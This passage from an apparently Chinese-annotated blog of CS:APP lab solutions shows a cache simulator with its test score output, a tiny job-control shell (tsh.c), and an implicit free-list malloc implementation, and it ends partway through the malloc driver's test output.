    printf("  -s <num>   Number of set index bits.\n");
    printf("  -E <num>   Number of lines per set.\n");
    printf("  -b <num>   Number of block offset bits.\n");
    printf("  -t <file>  Trace file.\n");
    printf("\n");
    printf("Examples:\n");
    printf("  linux>  ./csim-ref -s 4 -E 1 -b 4 -t traces/yi.trace\n");
    printf("  linux>  ./csim-ref -v -s 8 -E 2 -b 4 -t traces/yi.trace\n");
}

int getArguments(int argc, char** argv)
{
    int ch;

    int ret = TRUE;

    while ((ch = getopt(argc, argv, "hvsEbt")) != EOF)
    {
        switch(ch)
        {
            case 'h':
                printUsage();
                break;
            case 'v':
                verbose = TRUE;
                break;
            case 's':
                s = atoi(argv[optind]);
                if (s <= 0) {
                    ret = FALSE;
                    printUsage();
                }
                S = 1 << s;
                break;
            case 'E':  // 每一组的行数
                E = atoi(argv[optind]);
                if (E <= 0) {
                    ret = FALSE;
                    printUsage();
                }
                break;
            case 'b':
                b = atoi(argv[optind]);
                if (b <= 0) {
                    ret = FALSE;
                    printUsage();
                } else {
                    B = (1 << b);
                }
                break;
            case 't':
                traceFile = fopen(argv[optind], "r");
                if (!traceFile) {
                    ret = FALSE;
                    printUsage();
                }
                break;
            default:
                ret = FALSE;
                printUsage();
                break;
        }
    }

    return ret;
}

void initCache()
{
    cache = (CacheSet*)malloc(sizeof(CacheSet) * S);
    for (int i = 0; i < S; ++i) {
        cache[i] = (CacheLine*)malloc(sizeof(CacheLine) * E);
        for (int j = 0; j < E; ++j) {
            cache[i][j].tag = -1;
            cache[i][j].timeStamp = 0;
        }
    }
}

void release()
{
    for (int i = 0; i < S; ++i) {
        free(cache[i]);
    }
    free(cache);

    if (traceFile) {
        fclose(traceFile);
    }
}

void getCache(uint64_t tag, int setIndex)
{
    int emptyLineIndex = -1;
    int minTimeStampIndex = 0;

    ++curTimeStamp;

    for (int i = 0; i < E; ++i)
    {
        if (cache[setIndex][i].tag == tag) {
            if (verbose) {
                printf("hit ");
            }
            ++result.hit;
            cache[setIndex][i].timeStamp = curTimeStamp;
            return;
        }

        if (cache[setIndex][i].timeStamp == 0 && emptyLineIndex < 0) {
            emptyLineIndex = i;
        }

        if (cache[setIndex][minTimeStampIndex].timeStamp > cache[setIndex][i].timeStamp) {
            minTimeStampIndex = i;
        }
    }

    if (verbose) {
        printf("miss ");
    }
    ++result.miss;

    if (emptyLineIndex >= 0) {
        cache[setIndex][emptyLineIndex].tag = tag;
        cache[setIndex][emptyLineIndex].timeStamp = curTimeStamp;
    }
    else {
        if (verbose) {
            printf("eviction ");
        }
        cache[setIndex][minTimeStampIndex].tag = tag;
        cache[setIndex][minTimeStampIndex].timeStamp = curTimeStamp;
        ++result.eviction;
    }
}
jason@jason-virtual-machine:~/csapp/csapplab/cachelab/cachelab-handout$ ./test-csim 
                        Your simulator     Reference simulator
Points (s,E,b)    Hits  Misses  Evicts    Hits  Misses  Evicts
     3 (1,1,1)       9       8       6       9       8       6  traces/yi2.trace
     3 (4,2,4)       4       5       2       4       5       2  traces/yi.trace
     3 (2,1,4)       2       3       1       2       3       1  traces/dave.trace
     3 (2,1,3)     167      71      67     167      71      67  traces/trans.trace
     3 (2,2,3)     201      37      29     201      37      29  traces/trans.trace
     3 (2,4,3)     212      26      10     212      26      10  traces/trans.trace
     3 (5,1,5)     231       7       0     231       7       0  traces/trans.trace
     6 (5,1,5)  265189   21775   21743  265189   21775   21743  traces/long.trace
    27

TEST_CSIM_RESULTS=27

参考资料

  • https://gitee.com/lin-xi-269/csapplab/blob/master/lab5cachelab/cachelab-handout/csim.c
  • https://www.cnblogs.com/liqiuhao/p/8026100.html?utm_source=debugrun&utm_medium=referral
  • https://wdxtub.com/csapp/thick-csapp-lab-4/2016/04/16/

Lab6-tsh

/* 
 * tsh - A tiny shell program with job control
 * 
 * <Put your name and login ID here>
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

/* Misc manifest constants */
#define MAXLINE    1024   /* max line size */
#define MAXARGS     128   /* max args on a command line */
#define MAXJOBS      16   /* max jobs at any point in time */
#define MAXJID    1<<16   /* max job ID */

/* Job states */
#define UNDEF 0 /* undefined */
#define FG 1    /* running in foreground */
#define BG 2    /* running in background */
#define ST 3    /* stopped */

/* 
 * Jobs states: FG (foreground), BG (background), ST (stopped)
 * Job state transitions and enabling actions:
 *     FG -> ST  : ctrl-z
 *     ST -> FG  : fg command
 *     ST -> BG  : bg command
 *     BG -> FG  : fg command
 * At most 1 job can be in the FG state.
 */

/* Global variables */
extern char **environ;      /* defined in libc */
char prompt[] = "tsh> ";    /* command line prompt (DO NOT CHANGE) */
int verbose = 0;            /* if true, print additional output */
int nextjid = 1;            /* next job ID to allocate */
char sbuf[MAXLINE];         /* for composing sprintf messages */

struct job_t {              /* The job struct */
    pid_t pid;              /* job PID */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line */
};
struct job_t jobs[MAXJOBS]; /* The job list */
/* End global variables */


/* Function prototypes */

/* Here are the functions that you will implement */
void eval(char *cmdline);
int builtin_cmd(char **argv);
void do_bgfg(char **argv);
void waitfg(pid_t pid);

void sigchld_handler(int sig);
void sigtstp_handler(int sig);
void sigint_handler(int sig);

/* Here are helper routines that we've provided for you */
int parseline(const char *cmdline, char **argv); 
void sigquit_handler(int sig);

void clearjob(struct job_t *job);
void initjobs(struct job_t *jobs);
int maxjid(struct job_t *jobs); 
int addjob(struct job_t *jobs, pid_t pid, int state, char *cmdline);
int deletejob(struct job_t *jobs, pid_t pid); 
pid_t fgpid(struct job_t *jobs);
struct job_t *getjobpid(struct job_t *jobs, pid_t pid);
struct job_t *getjobjid(struct job_t *jobs, int jid); 
int pid2jid(pid_t pid); 
void listjobs(struct job_t *jobs);

void usage(void);
void unix_error(char *msg);
void app_error(char *msg);
typedef void handler_t(int);
handler_t *Signal(int signum, handler_t *handler);

/*
 * main - The shell's main routine 
 */
int main(int argc, char **argv) 
{
    char c;
    char cmdline[MAXLINE];
    int emit_prompt = 1; /* emit prompt (default) */

    /* Redirect stderr to stdout (so that driver will get all output
     * on the pipe connected to stdout) */
    dup2(1, 2);

    /* Parse the command line */
    while ((c = getopt(argc, argv, "hvp")) != EOF) {
      switch (c) {
        case 'h':             /* print help message */
            usage();
	          break;
        case 'v':             /* emit additional diagnostic info */
            verbose = 1;
	          break;
        case 'p':             /* don't print a prompt */
            emit_prompt = 0;  /* handy for automatic testing */
	          break;
	      default:
            usage();
	    }
    }

    /* Install the signal handlers */

    /* These are the ones you will need to implement */
    Signal(SIGINT,  sigint_handler);   /* ctrl-c */
    Signal(SIGTSTP, sigtstp_handler);  /* ctrl-z */
    Signal(SIGCHLD, sigchld_handler);  /* Terminated or stopped child */

    /* This one provides a clean way to kill the shell */
    Signal(SIGQUIT, sigquit_handler); 

    /* Initialize the job list */
    initjobs(jobs);

    /* Execute the shell's read/eval loop */
    while (1) {

      /* Read command line */
      if (emit_prompt) {
          printf("%s", prompt);
          fflush(stdout);
      }
      if ((fgets(cmdline, MAXLINE, stdin) == NULL) && ferror(stdin))
          app_error("fgets error");
      if (feof(stdin)) { /* End of file (ctrl-d) */
          fflush(stdout);
          exit(0);
      }

      /* Evaluate the command line */
      eval(cmdline);
      fflush(stdout);
      fflush(stdout);
    } 

    exit(0); /* control never reaches here */
}
  
/* 
 * eval - Evaluate the command line that the user has just typed in
 * 
 * If the user has requested a built-in command (quit, jobs, bg or fg)
 * then execute it immediately. Otherwise, fork a child process and
 * run the job in the context of the child. If the job is running in
 * the foreground, wait for it to terminate and then return.  Note:
 * each child process must have a unique process group ID so that our
 * background children don't receive SIGINT (SIGTSTP) from the kernel
 * when we type ctrl-c (ctrl-z) at the keyboard.  
*/
void eval(char *cmdline) 
{
    char* argv[MAXARGS];
    char buf[MAXLINE];
    int bg;
    pid_t pid;

    sigset_t mask_all, prev_all;

    strcpy(buf, cmdline);

    bg = parseline(cmdline, argv);
    if (argv[0] == NULL) {
        return;
    }

    if (builtin_cmd(argv)) {
        return;
    }

    sigfillset(&mask_all);
    // 阻塞所有信号
    sigprocmask(SIG_BLOCK, &mask_all, &prev_all);

    if ((pid = fork()) == 0) 
    {
        sigprocmask(SIG_SETMASK, &prev_all, NULL);
        // 重新设置gpid,因为当按下ctrl+c给子进程发送终止消息时,
        // 如果shell和子进程的进程组号相同,它们都会收到SIGINT,都会终止
        setpgid(0, 0);

        if (execve(argv[0], argv, environ) < 0) {
            printf("%s: Command not found\n", argv[0]);
            exit(0);
        }
    }

    // execve调用成功,不会返回,所以子进程不会执行到这里
    if (!bg) {
        // 前台进程
        addjob(jobs, pid, FG, cmdline);
        sigprocmask(SIG_SETMASK, &prev_all, NULL);
        waitfg(pid);
    }
    else {
        // 后台进程
        addjob(jobs, pid, BG, cmdline);
        sigprocmask(SIG_SETMASK, &prev_all, NULL);
        // 直接输出相关信息,不等待进程结束
        printf("[%d] (%d) %s", pid2jid(pid), pid, cmdline);
    }

    return;
}

/* 
 * parseline - Parse the command line and build the argv array.
 * 
 * Characters enclosed in single quotes are treated as a single
 * argument.  Return true if the user has requested a BG job, false if
 * the user has requested a FG job.  
 */
int parseline(const char *cmdline, char **argv) 
{
    static char array[MAXLINE]; /* holds local copy of command line */
    char *buf = array;          /* ptr that traverses command line */
    char *delim;                /* points to first space delimiter */
    int argc;                   /* number of args */
    int bg;                     /* background job? */

    strcpy(buf, cmdline);
    buf[strlen(buf)-1] = ' ';  /* replace trailing '\n' with space */
    while (*buf && (*buf == ' ')) /* ignore leading spaces */
	    buf++;

    /* Build the argv list */
    argc = 0;
    if (*buf == '\'') {
	    buf++;
	    delim = strchr(buf, '\'');
    }
    else {
	    delim = strchr(buf, ' ');
    }

    while (delim) {
      argv[argc++] = buf;
      *delim = '\0';
      buf = delim + 1;
      while (*buf && (*buf == ' ')) /* ignore spaces */
        buf++;

      if (*buf == '\'') {
        buf++;
        delim = strchr(buf, '\'');
      }
      else {
        delim = strchr(buf, ' ');
      }
    }
    argv[argc] = NULL;
    
    if (argc == 0)  /* ignore blank line */
      return 1;

    /* should the job run in the background? */
    if ((bg = (*argv[argc-1] == '&')) != 0) {
      argv[--argc] = NULL;
    }
    return bg;
}

/* 
 * builtin_cmd - If the user has typed a built-in command then execute
 *    it immediately.  
 */
int builtin_cmd(char **argv) 
{
    // "quit", "jobs", "bg", "fg"
    if (!strcmp(argv[0], "quit")) {
        exit(0);
    }

    if (!strcmp(argv[0], "jobs")) {
        listjobs(jobs);
        return 1;
    }

    if (!strcmp(argv[0], "fg") || !strcmp(argv[0], "bg")) {
        do_bgfg(argv);
        return 1;
    }

    // 不处理单独的'&'
    if (!strcmp(argv[0], "&")) {
        return 1;
    }

    return 0;     /* not a builtin command */
}

/* 
 * do_bgfg - Execute the builtin bg and fg commands
 */
void do_bgfg(char **argv) 
{
    /*
    bg:通过向作业发送SIGCONT信号来使它重启并放在后台运行
    fg:通过向作业发送SIGCONT信号来使它重启并放在前台运行
    输入时后面的参数有%则代表jid,没有则代表pid
    */

    if (argv[1] == NULL) {
        printf("%s command requires PID or %%jobid argument\n", argv[0]);
        return;
    }

    sigset_t mask_all, prev_all;
    sigfillset(&mask_all);
    // 阻塞信号,访问全局数组
    sigprocmask(SIG_BLOCK, &mask_all, &prev_all);

    struct job_t* job;
    int jid = 0;
    int pid = 0;

    // 获取jid or pid
    if (argv[1][0] == '%') {
        jid = atoi(argv[1] + 1);
    }
    else {
        pid = atoi(argv[1]);
    }

    // 处理非法输入jid或pid的情况
    if ((jid == 0 && argv[1][0] == '%') || (pid == 0 && argv[1][0] != '%'))
    {
        printf("%s: argument must be a PID or %%jobid\n", argv[0]);
        sigprocmask(SIG_SETMASK, &prev_all, NULL);
        return;
    }

    if (jid == 0) {
        jid = pid2jid(pid);
    }
    job = getjobjid(jobs, jid);
    if (!job) {
        if (argv[1][0] != '%') {
            printf("(%s): ", argv[1]);
        }
        else {
            printf("%s: ", argv[1]);
        }
        printf("No such %s\n", argv[1][0] == '%' ? "job" : "process");    
        sigprocmask(SIG_SETMASK, &prev_all, NULL);
        return;    
    }

    if (strcmp(argv[0], "bg") == 0) 
    {
        job->state = BG;
        printf("[%d] (%d) %s", job->jid, job->pid, job->cmdline);
        kill(-(job->pid), SIGCONT);
        sigprocmask(SIG_SETMASK, &prev_all, NULL);
    }
    else 
    {
        if (job->state == ST) {
            kill(-(job->pid), SIGCONT);
        }
        job->state = FG;
        sigprocmask(SIG_SETMASK, &prev_all, NULL);
        waitfg(job->pid);
    }

    return;
}

/* 
 * waitfg - Block until process pid is no longer the foreground process
 */
void waitfg(pid_t pid)
{
    sigset_t mask_all, prev_all;
    sigfillset(&mask_all);

    while (1)
    {
        // 访问全局变量需阻塞相关信号
        sigprocmask(SIG_BLOCK, &mask_all, &prev_all);
        struct job_t* foreground_job = getjobpid(jobs, pid);
        sigprocmask(SIG_SETMASK, &prev_all, NULL);

        // 如果找不到前台进程,或者前台进程已经挂起,则退出循环
        if (!foreground_job || foreground_job->state != FG) {
            break;
        }

        sleep(1);
    }

    return;
}

/*****************
 * Signal handlers
 *****************/

/* 
 * sigchld_handler - The kernel sends a SIGCHLD to the shell whenever
 *     a child job terminates (becomes a zombie), or stops because it
 *     received a SIGSTOP or SIGTSTP signal. The handler reaps all
 *     available zombie children, but doesn't wait for any other
 *     currently running children to terminate.  
 */
void sigchld_handler(int sig) 
{
    // 对于全局变量errno,注意保存和恢复
    int olderrno = errno;
    int status;

    sigset_t mask_all, prev_all;
    pid_t pid;

    sigfillset(&mask_all);

    // WNOHANG | WUNTRACED: 立即返回,如果等待集合中的子进程都没有被停止或终止,则返回0;
    // 如果有一个停止或终止,则返回该子进程的PID。
    while((pid = waitpid(-1, &status, WNOHANG | WUNTRACED)) > 0) {
        sigprocmask(SIG_BLOCK, &mask_all, &prev_all);

        if (WIFEXITED(status)) {
            // 子进程通过调用exit或者return正常终止
            deletejob(jobs, pid);
        }
        else if (WIFSIGNALED(status)) {
            // 子进程因为一个未被捕获的信号终止
            printf("Job [%d] (%d) terminated by signal %d\n", pid2jid(pid), pid, WTERMSIG(status));
            deletejob(jobs, pid);
        }
        else if (WIFSTOPPED(status)) {
            // 子进程是停止的
            printf("Job [%d] (%d) stopped by signal %d\n", pid2jid(pid), pid, WSTOPSIG(status));
            struct job_t* job = getjobpid(jobs, pid);
            job->state = ST;
        }

        sigprocmask(SIG_SETMASK, &prev_all, NULL);
    }

    errno = olderrno;
    return;
}

/* 
 * sigint_handler - The kernel sends a SIGINT to the shell whenver the
 *    user types ctrl-c at the keyboard.  Catch it and send it along
 *    to the foreground job.  
 */
void sigint_handler(int sig) 
{
    // 对于全局变量errno,注意保存和恢复
    int olderrno = errno;

    sigset_t mask_all, prev_all;
    sigfillset(&mask_all);
    // 阻塞所有信号
    sigprocmask(SIG_BLOCK, &mask_all, &prev_all);

    // 获取前台进程
    pid_t pid = fgpid(jobs);
    if (pid != 0) {
        // -pid而不是pid,保证信号能够被传递给整个子进程组,因为shell fork出来的子进程可能还会fork出子进程
        kill(-pid, SIGINT);
    }

    sigprocmask(SIG_SETMASK, &prev_all, NULL);
    errno = olderrno;
    return;
}

/*
 * sigtstp_handler - The kernel sends a SIGTSTP to the shell whenever
 *     the user types ctrl-z at the keyboard. Catch it and suspend the
 *     foreground job by sending it a SIGTSTP.  
 */
void sigtstp_handler(int sig) 
{
    // 对于全局变量errno,注意保存和恢复
    int olderrno = errno;

    sigset_t mask_all, prev_all;
    sigfillset(&mask_all);
    // 阻塞所有信号
    sigprocmask(SIG_BLOCK, &mask_all, &prev_all);

    // 获取前台进程
    pid_t pid = fgpid(jobs);
    if (pid != 0) {
        // -pid而不是pid,保证信号能够被传递给整个子进程组,因为shell fork出来的子进程可能还会fork出子进程
        kill(-pid, SIGTSTP);
    }

    sigprocmask(SIG_SETMASK, &prev_all, NULL);
    errno = olderrno;
    return;
}

/*********************
 * End signal handlers
 *********************/

/***********************************************
 * Helper routines that manipulate the job list
 **********************************************/

/* clearjob - Clear the entries in a job struct */
void clearjob(struct job_t *job) {
    job->pid = 0;
    job->jid = 0;
    job->state = UNDEF;
    job->cmdline[0] = '\0';
}

/* initjobs - Initialize the job list */
void initjobs(struct job_t *jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
	clearjob(&jobs[i]);
}

/* maxjid - Returns largest allocated job ID */
int maxjid(struct job_t *jobs) 
{
    int i, max=0;

    for (i = 0; i < MAXJOBS; i++)
	if (jobs[i].jid > max)
	    max = jobs[i].jid;
    return max;
}

/* addjob - Add a job to the job list */
int addjob(struct job_t *jobs, pid_t pid, int state, char *cmdline) 
{
    int i;
    
    if (pid < 1)
	    return 0;

    for (i = 0; i < MAXJOBS; i++) {
      if (jobs[i].pid == 0) {
          jobs[i].pid = pid;
          jobs[i].state = state;
          jobs[i].jid = nextjid++;
          if (nextjid > MAXJOBS)
        nextjid = 1;
          strcpy(jobs[i].cmdline, cmdline);
            if(verbose){
              printf("Added job [%d] %d %s\n", jobs[i].jid, jobs[i].pid, jobs[i].cmdline);
                }
                return 1;
      }
    }
    printf("Tried to create too many jobs\n");
    return 0;
}

/* deletejob - Delete a job whose PID=pid from the job list */
int deletejob(struct job_t *jobs, pid_t pid) 
{
    int i;

    if (pid < 1)
	    return 0;

    for (i = 0; i < MAXJOBS; i++) {
      if (jobs[i].pid == pid) {
          clearjob(&jobs[i]);
          nextjid = maxjid(jobs)+1;
          return 1;
      }
    }
    return 0;
}

/* fgpid - Return PID of current foreground job, 0 if no such job */
pid_t fgpid(struct job_t *jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
      if (jobs[i].state == FG)
          return jobs[i].pid;
    return 0;
}

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t *getjobpid(struct job_t *jobs, pid_t pid) {
    int i;

    if (pid < 1)
	    return NULL;
    for (i = 0; i < MAXJOBS; i++)
      if (jobs[i].pid == pid)
          return &jobs[i];
    return NULL;
}

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t *getjobjid(struct job_t *jobs, int jid) 
{
    int i;

    if (jid < 1)
	    return NULL;
    for (i = 0; i < MAXJOBS; i++)
      if (jobs[i].jid == jid)
          return &jobs[i];
    return NULL;
}

/* pid2jid - Map process ID to job ID */
int pid2jid(pid_t pid) 
{
    int i;

    if (pid < 1)
	    return 0;
    for (i = 0; i < MAXJOBS; i++)
      if (jobs[i].pid == pid) {
          return jobs[i].jid;
      }
    return 0;
}

/* listjobs - Print the job list */
void listjobs(struct job_t *jobs) 
{
    int i;
    
    for (i = 0; i < MAXJOBS; i++) {
      if (jobs[i].pid != 0) {
          printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
          switch (jobs[i].state) {
        case BG: 
            printf("Running ");
            break;
        case FG: 
            printf("Foreground ");
            break;
        case ST: 
            printf("Stopped ");
            break;
          default:
            printf("listjobs: Internal error: job[%d].state=%d ", 
            i, jobs[i].state);
          }
          printf("%s", jobs[i].cmdline);
      }
    }
}
/******************************
 * end job list helper routines
 ******************************/


/***********************
 * Other helper routines
 ***********************/

/*
 * usage - print a help message
 */
void usage(void) 
{
    printf("Usage: shell [-hvp]\n");
    printf("   -h   print this message\n");
    printf("   -v   print additional diagnostic information\n");
    printf("   -p   do not emit a command prompt\n");
    exit(1);
}

/*
 * unix_error - unix-style error routine
 */
void unix_error(char *msg)
{
    fprintf(stdout, "%s: %s\n", msg, strerror(errno));
    exit(1);
}

/*
 * app_error - application-style error routine
 */
void app_error(char *msg)
{
    fprintf(stdout, "%s\n", msg);
    exit(1);
}

/*
 * Signal - wrapper for the sigaction function
 */
handler_t *Signal(int signum, handler_t *handler) 
{
    struct sigaction action, old_action;

    action.sa_handler = handler;  
    sigemptyset(&action.sa_mask); /* block sigs of type being handled */
    action.sa_flags = SA_RESTART; /* restart syscalls if possible */

    if (sigaction(signum, &action, &old_action) < 0)
	    unix_error("Signal error");
    return (old_action.sa_handler);
}

/*
 * sigquit_handler - The driver program can gracefully terminate the
 *    child shell by sending it a SIGQUIT signal.
 */
void sigquit_handler(int sig) 
{
    printf("Terminating after receipt of SIGQUIT signal\n");
    exit(1);
}

参考资料

  • https://blog.csdn.net/aufefgavo/article/details/120814016

Lab7-malloclab

  • mm.c
/*
 * mm-naive.c - The fastest, least memory-efficient malloc package.
 * 
 * In this naive approach, a block is allocated by simply incrementing
 * the brk pointer.  A block is pure payload. There are no headers or
 * footers.  Blocks are never coalesced or reused. Realloc is
 * implemented directly using mm_malloc and mm_free.
 *
 * NOTE TO STUDENTS: Replace this header comment with your own header
 * comment that gives a high level description of your solution.
 */
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

/*********************************************************
 * NOTE TO STUDENTS: Before you do anything else, please
 * provide your team information in the following struct.
 ********************************************************/
team_t team = {
    /* Team name */
    "ateam",
    /* First member's full name */
    "Harry Bovik",
    /* First member's email address */
    "bovik@cs.cmu.edu",
    /* Second member's full name (leave blank if none) */
    "",
    /* Second member's email address (leave blank if none) */
    ""
};

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)


#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))


#define WSIZE 4 /* word and header/footer size(bytes)*/
#define DSIZE 8 /* Double word size(bytes)*/
#define CHUNKSIZE (1<<12)

#define MAX(x, y) ((x) > (y) ? (x) : (y))

/* Pack a size and allocated bit into a word */
#define PACK(size, alloc) ((size) | (alloc))

/* Read and write a word at address p */
#define GET(p) (*(unsigned int*)(p))
#define PUT(p, val) (*(unsigned int*)(p) = val)

/* Read the size and allocated fields from address p */
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)

/* Given block ptr bp, compute address of its header and footer */
#define HDRP(bp) ((char*)(bp) - WSIZE)
#define FTRP(bp) ((char*)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)

/* Given block ptr bp, compute address of next and previous blocks */
#define NEXT_BLKP(bp) ((char*)(bp) + GET_SIZE(((char*)(bp) - WSIZE)))
#define PREV_BLKP(bp) ((char*)(bp) - GET_SIZE(((char*)(bp) - DSIZE)))


/* Heap prologue block pointer */
static void *heap_listp;


/* 
 * mm_init - initialize the malloc package.
 */
int mm_init(void)
{
    /* 申请4个字节的空间 */
    if ((heap_listp = mem_sbrk(4 * WSIZE)) == (void*)-1)
        return -1;

    /* 双字边界对齐的不使用的填充字 */
    PUT(heap_listp, 0);

    /* 序言块, 8个字节的已分配块, 只由一个头部和一个脚部组成 */
    PUT(heap_listp + (1*WSIZE), PACK(DSIZE, 1));
    PUT(heap_listp + (2*WSIZE), PACK(DSIZE, 1));

    /* 结尾块, 大小为0的已分配块 */
    PUT(heap_listp + (3*WSIZE), PACK(0, 1));

    /* 指向有效载荷, 序言块的中间 */
    heap_listp += (2*WSIZE);

    /* Extend the empty heap with a free block of CHUNKSIZE bytes */
    if (extend_heap(CHUNKSIZE / WSIZE) == NULL)
        return -1;

    return 0;
}

void *extend_heap(size_t words)
{
    /* bp总是指向有效载荷 */
    char *bp;
    size_t size;

    /* aligment */
    size = (words % 2) ? (words + 1) * WSIZE : words * WSIZE;
    if ((long)(bp = mem_sbrk(size)) == -1)
        return NULL;

    /* HDRP(bp) 指向原结尾块 */
    PUT(HDRP(bp), PACK(size, 0));
    PUT(FTRP(bp), PACK(size, 0));
    PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));  /* 新结尾块 */

    /* 判断相邻块是否是空闲块, 进行合并 */
    return coalesced(bp);
}

void *find_fit(size_t asize)
{
    void *p;

    for (p = heap_listp; GET_SIZE(HDRP(p)) > 0; p = NEXT_BLKP(p)) {
        if (!GET_ALLOC(HDRP(p)) && (asize <= GET_SIZE(HDRP(p)))) {
            return p;
        }
    }

    return NULL;
}


/* 
 * mm_malloc - Allocate a block by incrementing the brk pointer.
 *     Always allocate a block whose size is a multiple of the alignment.
 */
void *mm_malloc(size_t size)
{
    /*
    int newsize = ALIGN(size + SIZE_T_SIZE);
    void *p = mem_sbrk(newsize);
    if (p == (void *)-1)
	return NULL;
    else {
        *(size_t *)p = size;
        return (void *)((char *)p + SIZE_T_SIZE);
    }
    */
    
    /* 对齐, 查找有无合适的空闲块, 如果没有则申请扩展堆 */
    size_t asize;  /* Adjusted block size */
    size_t extendsize;

    char *bp;

    if (size == 0)
        return NULL;

    if (size <= DSIZE)
        asize = 2 * DSIZE;
    else
        asize = DSIZE * ((size + (DSIZE) + (DSIZE-1)) / DSIZE);

    /* 寻找合适的空闲块 */
    if ((bp = find_fit(asize)) != NULL) {
        place(bp, asize);
        return bp;
    }

    /* 找不到则扩展堆 */
    extendsize = MAX(asize, CHUNKSIZE);
    if ((bp=extend_heap(extendsize / WSIZE)) == NULL)
        return NULL;
    place(bp, asize);
    return bp;
}

/*
 * mm_free - Freeing a block does nothing.
 */
void mm_free(void *ptr)
{
    size_t size = GET_SIZE(HDRP(ptr));
    PUT(HDRP(ptr), PACK(size, 0));
    PUT(FTRP(ptr), PACK(size, 0));
    coalesced(ptr);
}

/*
 * mm_realloc - Implemented simply in terms of mm_malloc and mm_free
 */
void *mm_realloc(void *ptr, size_t size)
{
    /*
    void *oldptr = ptr;
    void *newptr;
    size_t copySize;
    
    newptr = mm_malloc(size);
    if (newptr == NULL)
      return NULL;
    copySize = *(size_t *)((char *)oldptr - SIZE_T_SIZE);
    if (size < copySize)
      copySize = size;
    memcpy(newptr, oldptr, copySize);
    mm_free(oldptr);
    return newptr;
    */
    
    void *oldptr = ptr;
    void *newptr;
    void *nextptr;

    size_t blocksize;
    size_t extendsize;
    size_t asize;
    size_t sizesum;

    if (ptr == NULL) {
        return mm_malloc(size);
    } 

    if (size == 0) {
        mm_free(ptr);
        return NULL;
    }

    if (size <= DSIZE)
        asize = 2*DSIZE;
    else
        asize = DSIZE * ((size + (DSIZE) + (DSIZE-1)) / DSIZE);


    blocksize = GET_SIZE(HDRP(ptr));

    if (asize == blocksize)
        return ptr;

    if (asize < blocksize) {
        place(ptr, asize);
        return ptr;
    }

    /* asize > blocksize*/
    nextptr = NEXT_BLKP(ptr);
    sizesum = GET_SIZE(HDRP(nextptr)) + blocksize;
    if (!GET_ALLOC(HDRP(nextptr)) && sizesum >= asize) {
        PUT(HDRP(ptr), PACK(sizesum, 0));
        place(ptr, asize);
        return ptr;
    }

    /* Next block is allocated or size is not enough */
    newptr = find_fit(asize);
    if (newptr == NULL) {
        extendsize = MAX(asize, CHUNKSIZE);
        if ((newptr = extend_heap(extendsize / WSIZE)) == NULL) {
            return NULL;
        }
    }

    place(newptr, asize);
    memcpy(newptr, oldptr, blocksize - 2*WSIZE);
    mm_free(oldptr);
    return newptr;
}

/* 分离空闲块 */
void place(void *bp, size_t asize)
{
    size_t size = GET_SIZE(HDRP(bp));
    if (size - asize >= 2 * DSIZE) {
        PUT(HDRP(bp), PACK(asize, 1));
        PUT(FTRP(bp), PACK(asize, 1));

        bp = NEXT_BLKP(bp);

        PUT(HDRP(bp), PACK(size - asize, 0));
        PUT(FTRP(bp), PACK(size - asize, 0));
    }
    else {
        PUT(HDRP(bp), PACK(size, 1));
        PUT(FTRP(bp), PACK(size, 1));
    }
}

/* 合并空闲块 */
void *coalesced(void *ptr)
{
    size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(ptr)));
    size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(ptr)));

    size_t size = GET_SIZE(HDRP(ptr));

    if (prev_alloc && next_alloc) {
        return ptr;
    }
    else if (!prev_alloc && next_alloc) {
        size += GET_SIZE(FTRP(PREV_BLKP(ptr)));
        PUT(FTRP(ptr), PACK(size, 0));
        PUT(HDRP(PREV_BLKP(ptr)), PACK(size, 0));
        ptr = PREV_BLKP(ptr);
    }
    else if (prev_alloc && !next_alloc) {
        size += GET_SIZE(HDRP(NEXT_BLKP(ptr)));
        PUT(HDRP(ptr), PACK(size, 0));  /* 先修改头 */
        PUT(FTRP(ptr), PACK(size, 0));  /* 根据头部中的大小来定位尾部 */
    }
    else if (!prev_alloc && !next_alloc) {
        size += (GET_SIZE(FTRP(PREV_BLKP(ptr))) + GET_SIZE(HDRP(NEXT_BLKP(ptr))));
        PUT(FTRP(NEXT_BLKP(ptr)), PACK(size, 0));
        PUT(HDRP(PREV_BLKP(ptr)), PACK(size, 0));
        ptr = PREV_BLKP(ptr);
    }
    return ptr;
}
  • mm.h
#include <stdio.h>

extern int mm_init (void);
extern void *mm_malloc (size_t size);
extern void mm_free (void *ptr);
extern void *mm_realloc(void *ptr, size_t size);

extern void *extend_heap(size_t words);
extern void *find_fit(size_t asize);
extern void place(void *bp, size_t asize);
extern void *coalesced(void *ptr);

/* 
 * Students work in teams of one or two.  Teams enter their team name, 
 * personal names and login IDs in a struct of this
 * type in their bits.c file.
 */
typedef struct {
    char *teamname; /* ID1+ID2 or ID1 */
    char *name1;    /* full name of first member */
    char *id1;      /* login ID of first member */
    char *name2;    /* full name of second member (if any) */
    char *id2;      /* login ID of second member */
} team_t;

extern team_t team;
  • 测试结果
jason@jason-virtual-machine:~/csapp/csapplab/malloclab/malloclab-handout$ ./mdriver -t ./traces -V
Team Name:ateam
Member 1 :Harry Bovik:bovik@cs.cmu.edu
Using default tracefiles in ./traces/
Measuring performance with gettimeofday().

Testing mm malloc
Reading tracefile: amptjp-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: cccp-bal.rep
